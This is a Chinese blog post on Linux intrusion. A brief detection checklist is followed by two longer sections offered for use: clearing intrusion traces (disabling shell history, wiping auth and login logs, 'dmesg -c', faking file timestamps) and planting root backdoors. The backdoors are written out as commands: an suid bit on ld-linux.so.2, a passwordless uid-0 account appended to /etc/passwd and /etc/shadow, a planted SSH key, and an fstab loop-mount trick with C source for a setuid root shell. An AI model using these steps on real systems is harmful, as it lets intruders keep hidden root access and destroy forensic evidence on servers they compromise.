当前位置: 开发笔记 > 编程语言 > 正文

linux后门程序,Linux后门

作者：那一世我给不了你的温柔 | 来源：互联网 | 2023-09-18 02:38

Linux入侵检测0.断网1.history查看最近命令执行历史2.varlog*日志检查3.lastloglast查看登录信息4.netstat-anp查看可疑连接5.lsmod

&＃61;&＃61;&＃61;Linux入侵检测&＃61;&＃61;&＃61;

0. 断网

1. history 查看最近命令执行历史

2. /var/log/* 日志检查

3. lastlog last 查看登录信息

4. netstat -anp 查看可疑连接

5. lsmod 查看加载的模块

6. ps -awuxf 查看可疑进程

7. /etc/passwd crontab shell ssh fstab配置文件检查

8. find / -perm -04000 -type f -print 查看设置了suid的文件

9. 建立系统指纹档案和sha1校验值

10. 入侵检测工具的使用chkrootkit rootkit

&＃61;&＃61;&＃61;Linux入侵痕迹清除&＃61;&＃61;&＃61;

1. ~/.bash_history 命令清除

登录进去设置为不记录日志

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG;

export HISTFILE&＃61;/dev/null;

export HISTSIZE&＃61;0;

export HISTFILESIZE&＃61;0;

2. /var/log/secure;

/var/log/lastlog;

/var/log/Wtmp;

/var/run/Utmp;

/var/log/messages;

/var/log/auth;

/var/log/sulog;

/var/log/syslog;

敏感日志文件清除

3. dmesg记录清除 dmesg -c 需要root

4. httpd日志

5. 修改文件时间戳&＃xff0c;touch -r

6. 使用日志清除工具 logtamper

&＃61;&＃61;&＃61;Linux服务器留后门&＃61;&＃61;&＃61;

1. 添加suid位

chmod &＃43;s /lib/ld-linux.so.2

CentOS 5.6环境下,ld-linux.so.2是ld-2.5.so的符号链接

利用方法 /lib/ld-linux.so.2 &＃96;which whoami&＃96;

2. 添加id为0的帐号

echo "username::0:0::/:/bin/bash" >> /etc/passwd

echo "username::::::::" >> /etc/shadow

3. 上传公钥

mkdir .ssh

scp ~/.ssh/id_rsa.pub root&＃64;remote_ip:/root/.ssh/authorized_keys

以后登录就不需要密码

4. 利用fstab

chmod a&＃43;w /etc/fstab

利用方法

echo "test /mnt ext2 user,suid,exec,loop 0 0&＃39; >> /etc/fstab

把test文件上传到服务器

mount test

cd /mnt

./root

test文件的生成

/*setuid.c*/

#include

int main()

{

setuid(0);

seteuid(0);

setgid(0);

setegid(0);

system("/bin/bash");

return 0;

}

//end

编译 gcc -o setuid -O3 -static setuid.c

dd if&＃61;/dev/sda of&＃61;test bs&＃61;1M count&＃61;1

mkfs.ext2 test

mount -o -loop ./test /mnt

cd /mnt

cp path_to_setuid .

chown root:root setuid

chmod &＃43;s setuid

这样test文件就生成好了

4.内核级后门

自己写或者网上搜索。一般要注意适用的内核版本号。

推荐阅读

ip
【shell】网络处理：判断IP是否在网段、两个ip是否同网段、IP地址范围、网段包含关系

本文介绍了使用shell脚本判断IP是否在同一网段、判断IP地址是否在某个范围内、计算IP地址范围、判断网段之间的包含关系的方法和原理。通过对IP和掩码进行与计算，可以判断两个IP是否在同一网段。同时，还提供了一段用于验证IP地址的正则表达式和判断特殊IP地址的方法。 ... [详细]

蜡笔小新 2023-12-12 11:19:14
ip
Go Cobra命令行工具入门教程

本文介绍了Go语言实现的命令行工具Cobra的基本概念、安装方法和入门实践。Cobra被广泛应用于各种项目中，如Kubernetes、Hugo和Github CLI等。通过使用Cobra，我们可以快速创建命令行工具，适用于写测试脚本和各种服务的Admin CLI。文章还通过一个简单的demo演示了Cobra的使用方法。 ... [详细]

蜡笔小新 2023-12-12 20:02:41
request
SpringMVC接收请求参数的方式总结

本文总结了在SpringMVC开发中处理控制器参数的各种方式，包括处理使用@RequestParam注解的参数、MultipartFile类型参数和Simple类型参数的RequestParamMethodArgumentResolver，处理@RequestBody注解的参数的RequestResponseBodyMethodProcessor，以及PathVariableMapMethodArgumentResol等子类。 ... [详细]

蜡笔小新 2023-12-11 19:55:40
ip
使用JSONObiect和Gson相关方法实现json数据与kotlin对象的相互转换

本文介绍了如何使用JSONObiect和Gson相关方法实现json数据与kotlin对象的相互转换。首先解释了JSON的概念和数据格式，然后详细介绍了相关API，包括JSONObject和Gson的使用方法。接着讲解了如何将json格式的字符串转换为kotlin对象或List，以及如何将kotlin对象转换为json字符串。最后提到了使用Map封装json对象的特殊情况。文章还对JSON和XML进行了比较，指出了JSON的优势和缺点。 ... [详细]

蜡笔小新 2023-12-11 16:20:50
js
node . js require 和 ES6 导入导出的区别

node.jsrequire和ES6导入导出的区别原 ... [详细]

蜡笔小新 2023-12-10 11:12:31
ip
qemu模拟arm并调试汇编的方法和注意事项

原文地址http://balau82.wordpress.com/2010/02/28/hello-world-for-bare-metal-arm-using-qemu/最开始时 ... [详细]

蜡笔小新 2023-10-17 19:43:26
ip
Mac Android 源码下载编译运行 Android6.0.1

其实之前也有下载过完整的android源码，但是从来没有对这个做过一些总结，在加上最近需要经常去看，索性就在从新下载，编译一下，其实这些东西官网上面都有。http:sou ... [详细]

蜡笔小新 2023-10-17 19:20:12
config
Linux服务器密码过期策略、登录次数限制、私钥登录等配置方法

本文介绍了在Linux服务器上进行密码过期策略、登录次数限制、私钥登录等配置的方法。通过修改配置文件中的参数，可以设置密码的有效期、最小间隔时间、最小长度，并在密码过期前进行提示。同时还介绍了如何进行公钥登录和修改默认账户用户名的操作。详细步骤和注意事项可参考本文内容。 ... [详细]

蜡笔小新 2023-12-14 17:57:01
js
【机器学习】生成式对抗网络模型综述

生成式对抗网络模型综述摘要生成式对抗网络模型(GAN)是基于深度学习的一种强大的生成模型，可以应用于计算机视觉、自然语言处理、半监督学习等重要领域。生成式对抗网络 ... [详细]

蜡笔小新 2023-12-14 17:51:18
ip
C#学习教程：在Console中工作但在Windows窗体中不工作的异步代码分享

本文分享了一个关于在C#中使用异步代码的问题，作者在控制台中运行时代码正常工作，但在Windows窗体中却无法正常工作。作者尝试搜索局域网上的主机，但在窗体中计数器没有减少。文章提供了相关的代码和解决思路。 ... [详细]

蜡笔小新 2023-12-14 15:56:00
ip
android listview OnItemClickListener失效原因

最近在做listview时发现OnItemClickListener失效的问题，经过查找发现是因为button的原因。不仅listitem中存在button会影响OnItemClickListener事件的失效，还会导致单击后listview每个item的背景改变，使得item中的所有有关焦点的事件都失效。本文给出了一个范例来说明这种情况，并提供了解决方法。 ... [详细]

蜡笔小新 2023-12-14 14:25:50
js
如何使用Java获取服务器硬件信息和磁盘负载率

本文介绍了使用Java编程语言获取服务器硬件信息和磁盘负载率的方法。首先在远程服务器上搭建一个支持服务端语言的HTTP服务，并获取服务器的磁盘信息，并将结果输出。然后在本地使用JS编写一个AJAX脚本，远程请求服务端的程序，得到结果并展示给用户。其中还介绍了如何提取硬盘序列号的方法。 ... [详细]

蜡笔小新 2023-12-14 13:56:20
js
vue-awesome-swiper的使用

本文介绍了如何使用vue-awesome-swiper组件，包括在main.js中引入和使用swiper和swiperSlide组件，以及设置options和ref属性。同时还介绍了如何在模板中使用swiper和swiperSlide组件，并展示了如何通过循环渲染swipes数组中的数据，并使用picUrl属性显示图片。最后还介绍了如何添加分页器。 ... [详细]

蜡笔小新 2023-12-11 19:35:32
ip
编写可保护的代码的重要性及优化方法

本文讨论了编写可保护的代码的重要性，包括提高代码的可读性、可调试性和直观性。同时介绍了优化代码的方法，如代码格式化、解释函数和提炼函数等。还提到了一些常见的坏代码味道，如不规范的命名、重复代码、过长的函数和参数列表等。最后，介绍了如何处理数据泥团和进行函数重构，以提高代码质量和可维护性。 ... [详细]

蜡笔小新 2023-12-11 18:32:44
request
Python程序安全运行的三个条件及预防措施

Python已成为全球最受欢迎的编程语言之一，然而Python程序的安全运行存在一定的风险。本文介绍了Python程序安全运行需要满足的三个条件，即系统路径上的每个条目都处于安全的位置、"主脚本"所在的目录始终位于系统路径中、若python命令使用-c和-m选项，调用程序的目录也必须是安全的。同时，文章还提出了一些预防措施，如避免将下载文件夹作为当前工作目录、使用pip所在路径而不是直接使用python命令等。对于初学Python的读者来说，这些内容将有所帮助。 ... [详细]

蜡笔小新 2023-12-09 10:20:23

那一世我给不了你的温柔

这个家伙很懒，什么也没留下！

Tags | 热门标签

RankList | 热门文章